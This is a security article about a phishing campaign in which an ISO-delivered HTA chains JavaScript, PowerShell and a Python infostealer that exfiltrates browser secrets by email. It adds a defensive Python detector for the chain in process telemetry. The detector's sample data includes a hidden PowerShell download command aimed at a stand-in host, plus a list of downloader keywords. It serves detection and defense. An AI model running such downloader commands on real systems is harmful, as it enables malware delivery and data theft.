Threat analysts have identified a phishing campaign that delivers a stealthy infostealer capable of exfiltrating a wide range of sensitive data. Beyond saved passwords, the malware targets session cookies, credit card information, data from Bitcoin-related browser extensions, and browsing history. Session cookies deserve particular attention: a stolen cookie lets an attacker take over an already-authenticated session without knowing the password or completing multi-factor authentication.
The attack starts with a phishing email that urges the recipient to open an attached purchase order. The emails often contain grammatical errors and are sent from spoofed addresses. The attachment is an ISO disc image that, when mounted, exposes an HTA (HTML Application) file. HTA files are run by mshta.exe as trusted desktop applications, outside the browser sandbox and its security restrictions, and files delivered inside a disc image have historically not carried the Mark of the Web that would otherwise trigger SmartScreen warnings.
Executing the HTA triggers a multi-stage chain: the HTA downloads and runs an obfuscated JavaScript file, which in turn launches a PowerShell script that retrieves a ZIP archive from a remote server. The archive contains a Python-based infostealer.
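The chain above (ISO, then HTA via mshta.exe, then JavaScript, then PowerShell, then Python) is visible in endpoint process-creation telemetry long before the stealer finishes its work. The following is an added example, not code from the original article or from Barracuda: it walks the parent-process links in Sysmon Event ID 1 style records and flags a PowerShell downloader or a Python interpreter that descends from mshta.exe. The sample events, PIDs, file paths, the mounted-ISO drive letter and the download URL are all constructed for the example.

```python
# Added example (not from the original article or Barracuda): detect the
# HTA -> JavaScript -> PowerShell -> Python chain in process-creation telemetry.
# All sample events, PIDs, paths and URLs below are constructed for illustration.
from __future__ import annotations
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Lowercased image basenames that mark a stage of the chain.
STAGE_IMAGES = {
    "mshta.exe": "hta",
    "wscript.exe": "script",
    "cscript.exe": "script",
    "powershell.exe": "powershell",
    "pwsh.exe": "powershell",
    "python.exe": "python",
    "pythonw.exe": "python",
}

# Substrings indicating PowerShell is fetching a payload from a remote server.
DOWNLOAD_MARKERS = (
    "invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
    "net.webclient", "start-bitstransfer", "invoke-restmethod",
)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def stage_of(event: ProcEvent) -> str | None:
    return STAGE_IMAGES.get(basename(event.image))


def ancestry(by_pid: dict[int, ProcEvent], pid: int) -> list[ProcEvent]:
    """Walk ppid links from the given process up to the root; child first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen-set guards against PID reuse loops
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def find_suspicious_chains(events: list[ProcEvent]) -> list[dict]:
    """Flag PowerShell downloaders and Python interpreters that descend from mshta.exe."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        stage = stage_of(e)
        if stage not in ("powershell", "python"):
            continue
        stages = [s for s in (stage_of(a) for a in ancestry(by_pid, e.pid)) if s]
        if "hta" not in stages:
            continue  # no HTA ancestor: ordinary scripting or admin activity
        if stage == "powershell":
            if not any(m in e.cmdline.lower() for m in DOWNLOAD_MARKERS):
                continue
            reason = "powershell download under mshta.exe"
        else:
            reason = "python interpreter under mshta.exe"
        findings.append({"pid": e.pid, "stages": stages, "reason": reason,
                         "cmdline": e.cmdline})
    return findings


# Constructed sample telemetry: one malicious chain (pids 200-500) beside benign activity.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe E:\Purchase_Order.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\u\AppData\Local\Temp\po.js"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
              "'http://payload.invalid/p.zip', $env:TEMP + '\\p.zip')"),
    ProcEvent(500, 400, r"C:\Users\u\AppData\Local\Temp\p\python.exe",
              r"python.exe C:\Users\u\AppData\Local\Temp\p\main.py"),
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Process"),
    ProcEvent(700, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Invoke-WebRequest https://updates.example/x.msi -OutFile x.msi"),
    ProcEvent(800, 100, r"C:\Python311\python.exe", "python.exe report.py"),
]

if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f["pid"], " <- ".join(f["stages"]), "|", f["reason"])
```

Run against the sample, the detector reports only pids 400 and 500; the interactive PowerShell download (pid 700) and the ordinary Python run (pid 800) are ignored because neither has mshta.exe in its ancestry. Requiring the HTA ancestor rather than matching on download cmdlets alone is what keeps the false-positive rate tolerable on a fleet where administrators use PowerShell daily.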
The stealer collects a large amount of browser data and local files. It extracts the master keys that Chromium-based browsers (Chrome, Edge, Yandex, and Brave) use to encrypt their stored data, which lets it decrypt and capture session cookies, saved passwords, and credit card information; it also takes browser histories and data from Bitcoin-related browser extensions. In addition, it harvests PDF files and zips entire directories, then exfiltrates everything by email to various addresses at the domain maternamedical.top. Exfiltration over email is a detection opportunity in itself: outbound SMTP from workstations and any traffic to that domain should be blocked and alerted on.
The implications are significant: the breadth of data this stealer collects goes well beyond typical credential theft, and stolen session cookies, card data and wallet-extension data can be turned directly into account takeover, lateral movement, or financial fraud. Because session cookies are taken, a password reset alone is not enough after an infection; active sessions must also be revoked. To combat such threats, Barracuda recommends implementing robust security protocols, continuous monitoring for suspicious activity, and employee education on the warning signs of phishing.
Multi-layered email protection that uses AI and machine learning can help detect and block phishing attempts before they reach user inboxes. As cyber-criminals continue to evolve their methods, businesses must remain vigilant and proactive in their security efforts.